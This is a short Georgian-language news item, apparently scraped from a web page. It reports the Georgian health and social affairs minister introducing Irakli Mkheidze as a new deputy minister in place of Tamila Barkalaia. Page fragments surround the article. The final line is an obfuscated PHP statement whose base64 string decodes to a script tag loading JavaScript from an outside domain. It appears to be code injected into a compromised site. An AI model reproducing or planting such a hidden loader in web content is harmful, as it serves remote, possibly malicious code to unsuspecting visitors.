celsiusi
ავერსი საქკაბელი

 ოკუპირებული ტერიტორიებიდან დევნილთა, შრომის, ჯანმრთელობისა და სოციალური დაცვის მინისტრმა, ზურაბ აზარაშვილმა თანამშრომლებს ახალი მოადგილე ირაკლი მხეიძე წარუდგინა.

უწყების ხელმძღვანელმა მას თანამდებობაზე დანიშვნა მიულოცა და წარმატებები უსურვა.

ირაკლი მხეიძე თამილა ბარკალაიას შეცვლის. ზურაბ აზარაშვილმა თამილა ბარკალაიას, რომელიც მინისტრის მოადგილის თანამდებობას შვიდი წლის განმავლობაში იკავებდა, ნაყოფიერი საქმიანობისთვის მადლობა გადაუხადა და სამომავლო საქმიანობაში წარმატებები უსურვა.

ჯანდაცვის მინისტრის მოადგილე ირაკლი მხეიძე სამედიცინო და ფარმაცევტული საქმიანობის რეგულირების სააგენტოს დირექტორის პოზიციას იკავებდა. მანამდე კი, დევნილთა, ეკომიგრანტთა და საარსებო წყაროებით უზრუნველყოფის სააგენტოს ხელმძღვანელობდა.

ინფორმაციას ჯანდაცვის სამინისტროს პრესსამსახური ავრცელებს.

255
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");